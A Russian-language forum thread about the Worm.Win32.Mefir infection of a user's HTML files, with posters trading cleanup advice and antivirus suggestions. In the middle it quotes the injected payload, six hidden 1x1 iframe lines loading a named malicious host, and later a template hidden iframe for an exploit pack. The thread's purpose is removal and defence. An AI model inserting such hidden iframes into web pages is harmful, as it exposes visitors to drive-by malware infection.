Спасибо Касперскому - в его базе этот червь появился 07:35 23 октября, и почти сразу был пойман на моем компе
Но!!!!
Касперский утверждает, что вирус не лечится - только удаление.
А вирь успел у меня заразить почти тысячу html-файлов!
Что это за зверь, чем он опасен? В яндексе и гугле нет описания вирусов семейства Worm.Win32.Mefir [Ответ]

ох уж эти вирусы. задолбали. я вот минут 15 тому назад как разобрался на своей тачке с Email-Worm.Win32.Brontok.a
Сцуко понаписал копий себя куда только смог. в windir/inf, localsettings и т.д. полчаса сидел и чистил ключи реестра и винт по описанию, взятому с viruslist.com. красота теперь - тачка перестала тормозить и трафик ползти дня за три уже успел найти у меня на компе почти 500 емейлов.
если ваш емейл в списке 1.txt - звиняйте за спам
Изображения
[Ответ]

MHC, я за тебя рад. Но мне что посоветуешь?
Удалять все html-файлы с компа? [Ответ]

Forrum, это ж червяк. Он не заражает, скорее всего, а просто копируется. [Ответ]

Сообщение от Part!zan:
Forrum, это ж червяк. Он не заражает, скорее всего, а просто копируется.

Я в курсе. Непонятно, почему файлы нельзя вылечить. Их содержимое осталось на месте, можно хотя бы ноутпадом скопировать [Ответ]

Forrum, как можно вылечить то, что не заражено? Это тело вируса. Его можно только удалить. Лечить там нечего. [Ответ]

Сообщение от Part!zan:
Forrum, как можно вылечить то, что не заражено? Это тело вируса. Его можно только удалить. Лечить там нечего.

Вирус показан в реальных html-файлах. Раньше их содержимое можно было просмотреть. Хочешь сказать, что сейчас вирус уничтожил все эти файлы и сидит теперь вместо них? [Ответ]

Forrum, а сейчас что с их содержимым? Просмотреть нельзя? В блокноте. [Ответ]

Сообщение от Forrum:
MHC, я за тебя рад. Но мне что посоветуешь?
Удалять все html-файлы с компа?

Не обязательно, но только ручками или скриптом придется поработать основательно. Достаточно "выкусить" hex код [Ответ]

Сообщение от shuri:
Не обязательно, но только ручками или скриптом придется поработать основательно. Достаточно "выкусить" hex код

Почему сам Касперский не может это сделать и вылечить?

Сообщение от Part!zan:
Forrum, а сейчас что с их содержимым? Просмотреть нельзя? В блокноте.

Антивирус заблокировал доступ к ним. Но непосредственно перед проверкой ноутпад открывал содержимое, все было на месте [Ответ]

Кстати, самые свежие Drweb и Avira этого червя не ловят

Уважаемые гуру, что посоветуете делать? У меня тысяча html с важной информацией, заражены все [Ответ]

Предлагаю все что заражено поместить в карантин. Найди тело вируса и его производные, найди ключи к этим файлам в реестре, удали их, удали из памяти и автозагрузки... Сложность только в том, чтобы определить само тело вируса и его производные))
На сколько я понял, то обычные антивирусы с подобными вирусами не справляются... И по лучше поищи в инете описание этого вируса, не может быть чтобы его небыло, если ток совсем новый так сказать... [Ответ]

Сообщение от prut123:
Предлагаю все что заражено поместить в карантин

Дык поместил сразу

Сообщение от prut123:
Найди тело вируса и его производные, найди ключи к этим файлам в реестре, удали их, удали из памяти и автозагрузки...

Как найти тело? какие ключи в реестре? Заражены html-файлы

Сообщение от prut123:
На сколько я понял, то обычные антивирусы с подобными вирусами не справляются... И по лучше поищи в инете описание этого вируса, не может быть чтобы его небыло, если ток совсем новый так сказать...

Предыдущие версии вируса Worm.Win32.Mefir.a-j известны больше полугода, на разных форумах задавались про них вопросы, никто не в курсе
Описания нет нигде, даже на сайте касперского [Ответ]

Может, если спец. антивирус для борьбы с червями такого типа?
Есть же спецантивирусы для борьбы с троянами [Ответ]

Сообщение от Forrum:
Может, если спец. антивирус для борьбы с червями такого типа?
Есть же спецантивирусы для борьбы с троянами

Можешь хотя бы одну html переслать мне? Только упакуй хотя бы двумя архиваторами и поставь пароль на архив. Слать сюда shuri клюква bk.ru [Ответ]

Сообщение от Коварный план:
У Авиры в базе больше 50 модификаций этого червя, ток что всё он ловит. Особенно если обновляться каждый день.

Коварный план, спасибо, в базе данных я не смотрел. Действительно, в базе он присутствует
Но у меня не находит! Проверял [Ответ]

Сообщение от Forrum:
Дык поместил сразу
Как найти тело? какие ключи в реестре? Заражены html-файлы
Предыдущие версии вируса Worm.Win32.Mefir.a-j известны больше полугода, на разных форумах задавались про них вопросы, никто не в курсе
Описания нет нигде, даже на сайте касперского

Тело х.з. как найти, когда у меня был червь я знал только один файл, который мне каспер показывал (ну и туеву кучу зараженных). Далее я полазил по инету и узнал какие при данном вирусе есть вредоносные файлы, далее вылавливал по поиску, в автозагрузке, удалял из памяти и из реестра в ручную. Могу посоветовать программу avz. Мало того что она по подобного рода вирусам специализируется, так ещё в ней есть такие полезные функции как поиск по реестру, просмотр автозагрузки (не то что можно через команду msconfig посмотреть, а полный список программ и служб, которые загружаются при запуске виндоуз). А и ещё у меня тогда диспетчер задач был заблокирован, так эта прога имеет функции его разблокировки, ну и свой диспетчер у нее тоже имеется [Ответ]

Сообщение от Forrum:
Может, если спец. антивирус для борьбы с червями такого типа?
Есть же спецантивирусы для борьбы с троянами

После выкусывания строчек
<iframe src="http://ntkrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ntkrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ntkrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ntkrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ntkrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>
<iframe src="http://ntkrnlpa.info/rc/?i=1" width=1 height=1 style="border:0"></iframe>
антивирусник больше не матерится :-) [Ответ]

Сообщение от shuri:
После выкусывания строчек

shuri, спасибо! какая программа поможет автоматически удалить эти ссылки во всех файлах сразу? [Ответ]

Сообщение от Forrum:
shuri, спасибо! какая программа поможет автоматически удалить эти ссылки во всех файлах сразу?

На вскидку http://www.wosoft.ru/load/43 [Ответ]

Коварный план, а ты как хотел? Есть и более другие строчки, на которые ругаются антивирусы. [Ответ]

Вообще не понимаю прикола, вы хотите чтобы удалить саму вредоносную программу или хотите чтоб на нее антивирус не ругался? О.о [Ответ]

Сообщение от prut123:
И по лучше поищи в инете описание этого вируса, не может быть чтобы его небыло...

Ты крупно ошибаешься, у тебя на копме может быть вирус о существовании которого ты можешь и не узнать вообще никогда )))

По сабжу:
Тег <iframe> добавляет к исходной странице ещё то, что находится по указанному адресу src='some_host'. В этом случае ещё загружается страница http://ntkr(НЕ ЗАХОДИТЬ ПО ССЫЛКЕ)nlpa.info/rc/?i=1, на которой, вероятно, и висит вредоносный код, с помощью которого тебе на комп через броузер зальются и запустятся реальные вирусы. [Ответ]

ЗЫ
У меня друг нашел некий вирус, который не палился никаким антивирусом, но это явно был вирь, он послал его на мыл в лабораторию касперского и описал, что этот вирус делает. Они изучили, ответили внесли в базу сигнатур. [Ответ]

Сообщение от prut123:
Вообще не понимаю прикола, вы хотите чтобы удалить саму вредоносную программу или хотите чтоб на нее антивирус не ругался? О.о

prut123, если честно, я в недоумении. Эти строчки в html-файлы записал вирус. Но где он сейчас?
Поэтому вопрос: данные строчки - это результат деятельности вируса mefir, или это сам вирус и есть? [Ответ]

Сообщение от Коварный план:
Каспер ругается на такие html? Может пора избавится от каспера?

правильно ругается, хрен знает, какие вирусы сольются на комп, если зайти по адресу, указанному в src [Ответ]

Сообщение от Коварный план:
Ходил по ссылке, ничего там нет. Да и не должен антивирус на эти строки ругаться, это бессмысленно.

Ходил? Умница! А теперь поставь фаерволл и смотри исходящие соединения(кстати мб, вирь уже отослал всю интересующую инфу хеккеру и больше соединяться с хостом не будет) =) Ты думаешь, если ты зашел по ссылке и ничего не произошло по твоему мнению, то ничего не произошло на самом деле !? )) [Ответ]

Типа знаю как рабтают вирусы и как используют уязвимости в броузерах. [Ответ]

Коварный план, угу...знаешь такую штуку, называется MPack или IcePack(можно и без паков обойтись)? Заходишь по ссылке и у тебя на компе вирь =)) А ссылка вида <iframe src="http://some_host/mpack/" visibility="hidden"></iframe>
Нахрен мне политех, я вообще мог бы учится в муз. училище, это ничего не меняет. [Ответ]

Да не ругайтесь вы! Понятно, что вирусы будут закачиваться по ссылке

Но где вирус, который записал эту ссылку в 1000 файлов? [Ответ]